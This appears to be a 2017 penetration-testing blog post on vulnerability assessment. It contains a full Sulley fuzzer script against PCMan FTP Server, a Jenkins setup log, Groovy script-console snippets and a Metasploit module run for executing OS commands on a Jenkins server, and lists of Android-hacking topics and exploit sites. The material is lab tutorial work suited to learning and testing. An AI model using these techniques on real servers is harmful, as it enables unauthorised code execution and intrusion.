\xeb\xfe's Blog.

Vulnerability Assessment - 1

2017/12/15

Vulnerability Assessment

Once you have identified the most feasible attack methods, you need to consider how to gain access to the target. During vulnerability analysis you combine the information learned in the previous phase and use it to understand which attacks are actually feasible. The analysis draws on port and vulnerability scans, the data collected by banner grabbing, and the information gathered during intelligence collection.

Assessment categories
Network assessment
Web application assessment
Database assessment

Network Assessment

Fuzzers-sulley

Code (fuzz_PCManftpd32.py)

#coding=utf-8
# Video 1: implementing a fuzzer with the Sulley framework (Sulley is Python 2 only)
# http://www.dfate.de/public/index.php/post/exploit-development-series-video-1-practical-fuzzing-basics-using-the-sulley-framework
# https://www.exploit-db.com/exploits/37731/

# -------------------------------------------------------------------
# Usage: start the two Sulley monitors on the target host first, then run this script
# C:\Fuzzing\sulley>python network_monitor.py -d 0 -f "port 21" -P audit
# C:\Fuzzing\sulley>python process_monitor.py -c audit\pcmanftpd_crashbin -p "PCManFTPD2.exe"

# -------------------------------------------------------------------
# Analysis: a normal session against the target, captured beforehand.
# This is what the grammar below imitates.

"""
220 PCMan's FTP Server 2.0 Ready.
USER anonymous
331 User name okay, need password.
PASS password12345
230 User logged in
PORT 192,168,1,106,206,27
200 Command okay.
STOR demo2.txt
150 File status okay; Open data connection.
226 Data Sent okay.
PORT 192,168,1,106,206,28
200 Command okay.
LIST
150 File status okay; Open data connection.
226 Data Sent okay.
PORT 192,168,1,106,206,29
200 Command okay.
RETR demo2.txt
150 File status okay; Open data connection.
226 Data Sent okay.
QUIT
"""

import sys
from sulley import *

# Overview
# 1. create the requests (define the fuzz grammar)
# 2. define the session
# 3. define the target
# 4. fuzz!

# s_initialize - start building a new request
# s_static("USER") - a static (unchanging) string that is never fuzzed
# s_delim(" ") - a delimiter that can be fuzzed; it gets a different, smaller set of mutations than s_string
# s_string("anonymous") - a string that will be mutated; it has far more mutations than s_delim

# -------------------------------------------------------------------
# Grammar definition
s_initialize("user")
s_static("USER")
s_delim(" ", fuzzable=False)
s_string("anonymous")
s_static("\r\n")

s_initialize("pass")
s_static("PASS")
s_delim(" ", fuzzable=False)
s_string("pass12345")
s_static("\r\n")

s_initialize("put")
s_static("PUT")
s_delim(" ", fuzzable=False)
s_string("fuzz_strings")
s_static("\r\n")

s_initialize("stor")
s_static("STOR")
s_delim(" ", fuzzable=True)
s_string("AAAA")
s_static("\r\n")

s_initialize("mkd")
s_static("MKD")
s_delim(" ", fuzzable=False)
s_string("AAAA")
s_static("\r\n")

# -------------------------------------------------------------------
# pre_send callback: Sulley calls it with the connected socket right after the
# three-way handshake, before the first request is sent. Reading the banner here
# keeps it from being mistaken for the reply to our first command.
def receive_ftp_banner(sock):
    data = sock.recv(1024)
    print(data)

# -------------------------------------------------------------------
# Session definition
# Session parameters
SESSION_FILENAME = "pcmanftpd-session"  # file that tracks the current fuzzing state (lets a run resume)
SLEEP_TIME = 0.5                        # pause between two test cases
TIMEOUT = 5                             # a test case times out after 5 seconds without a connection
CRASH_THRESHOLD = 4                     # after 4 crashes on the same primitive it is skipped

mysession = sessions.session(
    session_filename=SESSION_FILENAME,
    sleep_time=SLEEP_TIME,
    timeout=TIMEOUT,
    crash_threshold=CRASH_THRESHOLD)

mysession.pre_send = receive_ftp_banner
# Link the requests into a graph: root -> user -> pass -> {stor, mkd, put}.
# Each edge means "send the parent request(s) first, then fuzz the child".
mysession.connect(s_get("user"))
mysession.connect(s_get("user"), s_get("pass"))
mysession.connect(s_get("pass"), s_get("stor"))
mysession.connect(s_get("pass"), s_get("mkd"))
mysession.connect(s_get("pass"), s_get("put"))

# -------------------------------------------------------------------
# Render the graph of the fuzzing paths (uDraw format).
with open("session_test.udg", "w+") as f:
    f.write(mysession.render_graph_udraw())

# -------------------------------------------------------------------
# Some summary output
# s_num_mutations() counts the mutations of the most recently initialized request only,
# so "* 5" is just a rough estimate for the five requests defined above.
print("Number of mutation during one case: %s\n" % str(s_num_mutations()))
print("Total number of mutations: %s\n" % str(s_num_mutations() * 5))

decision = raw_input("Do you want to continue?(y/n): ")
if decision == "n":
    sys.exit()

# -------------------------------------------------------------------
# Target definition
host = "192.168.1.107"
ftp_port = 21
netmon_port = 26001   # default port of network_monitor.py on the target
procmon_port = 26002  # default port of process_monitor.py on the target
target = sessions.target(host, ftp_port)
target.procmon = pedrpc.client(host, procmon_port)
target.netmon = pedrpc.client(host, netmon_port)

# How the process monitor kills and restarts the target after a crash
target.procmon_options = {
    "proc_name": "pcmanftpd2.exe",
    "stop_commands": ["wmic process where (name='PCManFTPD2.exe') call terminate"],
    "start_commands": ["C:\\PCManFTP\\PCManFTPD2.exe"]
}

# Add the target to the session
mysession.add_target(target)

# -------------------------------------------------------------------
# Let's start

print("Starting fuzzing now")
mysession.fuzz()

# The fuzzing run is now in progress.
# Its current state can also be followed from the web interface (http://127.0.0.1:26000).

Code analysis

The script drives a fuzzing run through the Sulley framework. It first defines the grammar: several requests (the FTP commands USER, PASS, PUT, STOR and MKD), each built from static strings that are never mutated and s_string/s_delim primitives that are. It then registers a pre_send callback that runs right after the three-way handshake (it reads the FTP banner so the banner is not taken for the reply to the first command), defines the session and its parameters (session file, delay between cases, timeout, crash threshold), links the requests into a graph (user -> pass -> stor/mkd/put) and writes that graph to a .udg file, prints a summary of the number of mutations, defines the target (host, FTP port, and the RPC ports of the network monitor and process monitor running on the target), adds the target to the session and starts fuzzing. When the target dies, the process monitor records the crash in the crashbin given with -c, restarts PCManFTPD2.exe with start_commands, and the session carries on with the next case.

While it runs, the current state can be followed from the web interface at http://127.0.0.1:26000.

Jenkins Hacking

  1. How do you deploy Jenkins?
  2. How do you exploit a Jenkins server?

Jenkins is a self-contained, open-source automation server that can be used to automate all sorts of tasks such as building, testing and deploying software. Jenkins can be installed through native system packages or Docker, or even run standalone on any machine with a Java Runtime Environment installed.

How do you deploy Jenkins?

This guide uses the standalone Jenkins distribution, which requires at least Java 7 (Java 8 is recommended). A system with more than 512 MB of RAM is also recommended.

  1. Download Jenkins.
  2. Open a terminal in the download directory and run java -jar jenkins.war
  3. Open http://localhost:8080 in a browser and follow the instructions to complete the installation.
  4. Many Pipeline examples require Docker to be installed on the same machine as Jenkins.

Check the installation log, shown below:

root@lab:~/Downloads# java -jar jenkins.war
Running from: /root/Downloads/jenkins.war
webroot: $user.home/.jenkins
Mar 15, 2017 5:03:49 AM Main deleteWinstoneTempContents
WARNING: Failed to delete the temporary Winstone file /tmp/winstone/jenkins.war
Mar 15, 2017 5:03:50 AM org.eclipse.jetty.util.log.JavaUtilLog info
INFO: Logging initialized @6168ms
Mar 15, 2017 5:03:50 AM winstone.Logger logInternal
INFO: Beginning extraction from war file
Mar 15, 2017 5:04:05 AM org.eclipse.jetty.util.log.JavaUtilLog warn
WARNING: Empty contextPath
Mar 15, 2017 5:04:06 AM org.eclipse.jetty.util.log.JavaUtilLog info
INFO: jetty-9.2.z-SNAPSHOT
Mar 15, 2017 5:04:10 AM org.eclipse.jetty.util.log.JavaUtilLog info
INFO: NO JSP Support for /, did not find org.eclipse.jetty.jsp.JettyJspServlet
Jenkins home directory: /root/.jenkins found at: $user.home/.jenkins
Mar 15, 2017 5:04:20 AM org.eclipse.jetty.util.log.JavaUtilLog info
INFO: Started w.@30990c1b{/,file:/root/.jenkins/war/,AVAILABLE}{/root/.jenkins/war}
Mar 15, 2017 5:04:20 AM org.eclipse.jetty.util.log.JavaUtilLog info
INFO: Started ServerConnector@54227100{HTTP/1.1}{0.0.0.0:8080}
Mar 15, 2017 5:04:20 AM org.eclipse.jetty.util.log.JavaUtilLog info
INFO: Started @36602ms
Mar 15, 2017 5:04:20 AM winstone.Logger logInternal
INFO: Winstone Servlet Engine v2.0 running: controlPort=disabled
Mar 15, 2017 5:04:22 AM jenkins.InitReactorRunner$1 onAttained
INFO: Started initialization
Mar 15, 2017 5:04:23 AM jenkins.InitReactorRunner$1 onAttained
INFO: Listed all plugins
Mar 15, 2017 5:04:45 AM jenkins.InitReactorRunner$1 onAttained
INFO: Prepared all plugins
Mar 15, 2017 5:04:45 AM jenkins.InitReactorRunner$1 onAttained
INFO: Started all plugins
Mar 15, 2017 5:04:45 AM jenkins.InitReactorRunner$1 onAttained
INFO: Augmented all extensions
Mar 15, 2017 5:04:51 AM jenkins.InitReactorRunner$1 onAttained
INFO: Loaded all jobs
Mar 15, 2017 5:04:51 AM hudson.model.AsyncPeriodicWork$1 run
INFO: Started Download metadata
Mar 15, 2017 5:04:52 AM org.jenkinsci.main.modules.sshd.SSHD start
INFO: Started SSHD at port 43731
Mar 15, 2017 5:04:53 AM jenkins.InitReactorRunner$1 onAttained
INFO: Completed initialization
Mar 15, 2017 5:04:55 AM org.springframework.context.support.AbstractApplicationContext prepareRefresh
INFO: Refreshing org.springframework.web.context.support.StaticWebApplicationContext@4d8c4701: display name [Root WebApplicationContext]; startup date [Wed Mar 15 05:04:55 EDT 2017]; root of context hierarchy
Mar 15, 2017 5:04:55 AM org.springframework.context.support.AbstractApplicationContext obtainFreshBeanFactory
INFO: Bean factory for application context [org.springframework.web.context.support.StaticWebApplicationContext@4d8c4701]: org.springframework.beans.factory.support.DefaultListableBeanFactory@16f7f485
Mar 15, 2017 5:04:55 AM org.springframework.beans.factory.support.DefaultListableBeanFactory preInstantiateSingletons
INFO: Pre-instantiating singletons in org.springframework.beans.factory.support.DefaultListableBeanFactory@16f7f485: defining beans [authenticationManager]; root of factory hierarchy
Mar 15, 2017 5:04:58 AM org.springframework.context.support.AbstractApplicationContext prepareRefresh
INFO: Refreshing org.springframework.web.context.support.StaticWebApplicationContext@1aa6a1d4: display name [Root WebApplicationContext]; startup date [Wed Mar 15 05:04:58 EDT 2017]; root of context hierarchy
Mar 15, 2017 5:04:58 AM org.springframework.context.support.AbstractApplicationContext obtainFreshBeanFactory
INFO: Bean factory for application context [org.springframework.web.context.support.StaticWebApplicationContext@1aa6a1d4]: org.springframework.beans.factory.support.DefaultListableBeanFactory@26dbd965
Mar 15, 2017 5:04:58 AM org.springframework.beans.factory.support.DefaultListableBeanFactory preInstantiateSingletons
INFO: Pre-instantiating singletons in org.springframework.beans.factory.support.DefaultListableBeanFactory@26dbd965: defining beans [filter,legacy]; root of factory hierarchy
Mar 15, 2017 5:04:59 AM jenkins.install.SetupWizard init
INFO:

*************************************************************
*************************************************************
*************************************************************

Jenkins initial setup is required. An admin user has been created and a password generated.
Please use the following password to proceed to installation:

e019dca34bac4a30beca67b53e821f35

This may also be found at: /root/.jenkins/secrets/initialAdminPassword

*************************************************************
*************************************************************
*************************************************************

Mar 15, 2017 5:05:06 AM hudson.model.UpdateSite updateData
INFO: Obtained the latest update center data file for UpdateSource default
Mar 15, 2017 5:05:09 AM hudson.model.DownloadService$Downloadable load
INFO: Obtained the updated data file for hudson.tasks.Maven.MavenInstaller
Mar 15, 2017 5:05:09 AM hudson.model.UpdateSite updateData
INFO: Obtained the latest update center data file for UpdateSource default
Mar 15, 2017 5:05:10 AM hudson.WebAppMain$3 run
INFO: Jenkins is fully up and running
Mar 15, 2017 5:05:10 AM javax.jmdns.impl.HostInfo newHostInfo
WARNING: Could not intialize the host network interface on nullbecause of an error: lab: lab: Temporary failure in name resolution
java.net.UnknownHostException: lab: lab: Temporary failure in name resolution
at java.net.InetAddress.getLocalHost(InetAddress.java:1505)
at javax.jmdns.impl.HostInfo.newHostInfo(HostInfo.java:75)
at javax.jmdns.impl.JmDNSImpl.<init>(JmDNSImpl.java:407)
at javax.jmdns.JmDNS.create(JmDNS.java:60)
at hudson.DNSMultiCast$1.call(DNSMultiCast.java:33)
at jenkins.util.ContextResettingExecutorService$2.call(ContextResettingExecutorService.java:46)
at java.util.concurrent.FutureTask.run(FutureTask.java:266)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
at java.lang.Thread.run(Thread.java:745)
Caused by: java.net.UnknownHostException: lab: Temporary failure in name resolution
at java.net.Inet6AddressImpl.lookupAllHostAddr(Native Method)
at java.net.InetAddress$2.lookupAllHostAddr(InetAddress.java:928)
at java.net.InetAddress.getAddressesFromNameService(InetAddress.java:1323)
at java.net.InetAddress.getLocalHost(InetAddress.java:1500)
... 9 more

Mar 15, 2017 5:05:18 AM hudson.model.DownloadService$Downloadable load
INFO: Obtained the updated data file for hudson.tools.JDKInstaller
Mar 15, 2017 5:05:18 AM hudson.model.AsyncPeriodicWork$1 run
INFO: Finished Download metadata. 27,508 ms

Note this part: the generated password is required to complete the setup, and whoever reaches the wizard first with it becomes the administrator.

Jenkins initial setup is required. An admin user has been created and a password generated.
Please use the following password to proceed to installation:

e019dca34bac4a30beca67b53e821f35

How do you exploit a Jenkins server?

Visit http://127.0.0.1:8080/script and use the script console to pwn the Jenkins server. The console runs Groovy inside the Jenkins JVM with the privileges of the Jenkins service account, so it needs an account with administrator (Overall/Administer) permission; the admin created by the setup wizard has it, and so does anyone if security is left disabled.

Script console

Type in an arbitrary Groovy script and execute it on the server. Useful for trouble-shooting and diagnostics. Use the 'println' command to see the output (if you use System.out, it will go to the server's stdout, which is harder to see.)

For example:

execmd.groovy

execmd.groovy lets you execute OS commands on the Jenkins server.

// Windows

println "cmd.exe /c dir".execute().text


// Linux

println "uname -a".execute().text

writefile.groovy

writefile.groovy writes a string to a file on the Jenkins server.

new File("/tmp/test.sh").write("""
echo "123"
echo "456"
""")

If you prefer metasploit-framework, the jenkins_script_console module does the same through the script console, given a username and password with permission to use it:

msf > use exploit/multi/http/jenkins_script_console
msf exploit(jenkins_script_console) > show options

Module options (exploit/multi/http/jenkins_script_console):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   password         no        The password for the specified username
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.1.100    yes       The target address
   RPORT      8080             yes       The target port
   TARGETURI  /                yes       The path to jenkins
   USERNAME   test             no        The username to authenticate as
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   1   Linux

msf exploit(jenkins_script_console) > exploit

Links

  1. https://jenkins.io/

Web Application Assessment

Android hacking and security

  1. Exploiting protected application components
  2. Content provider leakage
  3. Exploiting broadcast receivers
  4. Exploiting unintended data leakage (side-channel data leakage)
  5. Debugging Java applications with jdb
  6. Exploiting debuggable Android applications
  7. Attacking Android WebViews
  8. Root detection evasion
  9. Insecure local storage: shared preferences
  10. Insecure local storage
  11. Black-box assessment with Introspy
  12. Protecting shared preferences with third-party libraries
  13. Introduction to drozer
  14. Inspecting Android application-specific data on non-rooted devices
  15. Attacking Android applications with backup techniques
  16. Breaking cryptography
  17. Cracking Android application binaries
  18. Introduction to reverse engineering
  19. Insecure data storage with NoSQL databases
  20. Debugging applications on the Android emulator with gdb
Android reverse engineering

  1. http://www.fasteque.com/android-reverse-engineering-101-part-1/
  2. http://www.fasteque.com/android-reverse-engineering-101-part-2/
  3. http://www.fasteque.com/android-reverse-engineering-101-part-3/
  4. http://www.fasteque.com/android-reverse-engineering-101-part-4/
  5. http://www.fasteque.com/android-reverse-engineering-101-part-5/

Android security and exploitation

  1. Introduction
  2. Android security: introduction
  3. Android architecture
  4. Android permissions
  5. Android applications
  6. Genymotion (an Android emulator) setup
  7. Android application components
  8. Dex analysis
  9. Android Debug Bridge
  10. Logging-based vulnerabilities
  11. Application reversing
  12. Analyzing Android software and malware
  13. Traffic analysis
  14. SSL pinning
  15. Leaking content providers
  16. Drozer kung fu
  17. Read-based content provider vulnerabilities
  18. Advanced Drozer kung fu
  19. Drozer scripting
  20. The Dropbox vulnerability
  21. Backup-based vulnerabilities
  22. Client-side injection
  23. Introduction to hooking and insecure setup
  24. Android debugging with AndBug
  25. JDB debugging
  26. Automated hooking with Introspy
  27. Cydia Substrate
  28. Hooking with Xposed
  29. Androguard scripting and analysis
  30. WebView-based vulnerabilities
  31. Exploiting WebViews with Metasploit

Recommended books

  1. Android Security Handbook
  2. Android Hacker's Handbook
  3. Learning Pentesting for Android Devices

Reference links

  1. http://www.exploit-db.com/
  2. http://www.cvedetails.com/
  3. http://packetstormsecurity.com/
  4. http://www.securityfocus.com/bid
  5. http://nvd.nist.gov/
  6. http://osvdb.org/
  7. http://cve.mitre.org/
  8. http://sec.jetlib.com/
  9. http://0day.today/
  10. https://www.seebug.org/
  11. https://www.rapid7.com/db/
  12. http://zerodayinitiative.com/advisories/published/
  13. http://exploitsearch.net/
  14. http://nvd.nist.gov/download/nvd-rss-analyzed.xml
  15. http://www.intelligentexploit.com/
  16. https://wpvulndb.com/
  17. http://www.wordpressexploit.com/
  18. http://www.drupalexploit.com/
  19. http://www.openwall.com/lists/oss-security/
  20. https://www.vulnerability-lab.com/